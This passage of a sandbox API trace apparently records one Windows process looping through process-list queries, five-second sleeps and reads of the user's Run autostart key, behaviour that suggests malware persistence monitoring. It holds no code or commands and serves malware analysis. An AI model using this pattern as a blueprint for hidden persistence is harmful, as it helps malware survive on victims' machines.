RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0185.486] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0185.488] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0185.488] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0185.501] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0185.501] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0185.501] NtClose (Handle=0x154) returned 0x0 [0185.501] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0185.502] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0185.502] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0185.502] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0185.502] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0185.504] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0185.505] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0185.515] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0185.516] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0185.516] NtClose (Handle=0x154) returned 0x0 [0185.516] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0185.516] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0185.516] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0185.517] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0185.517] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0185.519] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0185.519] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0185.531] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0185.531] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0185.531] NtClose (Handle=0x154) returned 0x0 [0185.531] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0185.532] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0185.532] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0185.532] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0185.532] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0185.534] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0185.535] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0185.547] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0185.547] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0185.547] NtClose (Handle=0x154) returned 0x0 [0185.547] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0185.547] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0185.548] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0185.548] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0185.548] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0185.550] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0185.551] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0185.562] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0185.562] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0185.562] NtClose (Handle=0x154) returned 0x0 [0185.562] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0185.563] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0185.563] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0185.563] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0185.564] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0185.565] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0185.566] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0185.578] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0185.578] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0185.578] NtClose (Handle=0x154) returned 0x0 [0185.578] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0185.578] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0185.579] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0185.579] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0185.579] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0185.582] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0185.583] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0185.595] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0185.595] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0185.595] NtClose (Handle=0x154) returned 0x0 [0185.595] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0185.595] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0185.596] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0185.596] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0185.596] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0185.598] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0185.598] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0185.610] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0185.610] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0185.611] NtClose (Handle=0x154) returned 0x0 [0185.611] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0185.611] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0185.611] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0185.612] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0185.612] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0185.614] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0185.615] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0185.625] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0185.625] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0185.625] NtClose (Handle=0x154) returned 0x0 [0185.625] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0185.625] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0185.625] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0185.626] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0185.626] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0185.628] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0185.628] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0185.642] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0185.645] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0185.646] NtClose (Handle=0x154) returned 0x0 [0185.646] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0185.646] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0185.647] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0185.647] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0185.648] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0185.651] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0185.651] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0185.656] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0185.656] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0185.656] NtClose (Handle=0x154) returned 0x0 [0185.656] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0185.656] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0185.657] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0185.657] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0185.657] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0185.659] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0185.660] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0185.671] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0185.672] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0185.672] NtClose (Handle=0x154) returned 0x0 [0185.672] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0185.672] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0185.672] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0185.673] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0185.673] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0185.675] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0185.675] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0185.687] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0185.687] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0185.687] NtClose (Handle=0x154) returned 0x0 [0185.687] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0185.688] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0185.688] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0185.688] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0185.688] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0185.690] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0185.691] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0185.703] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, 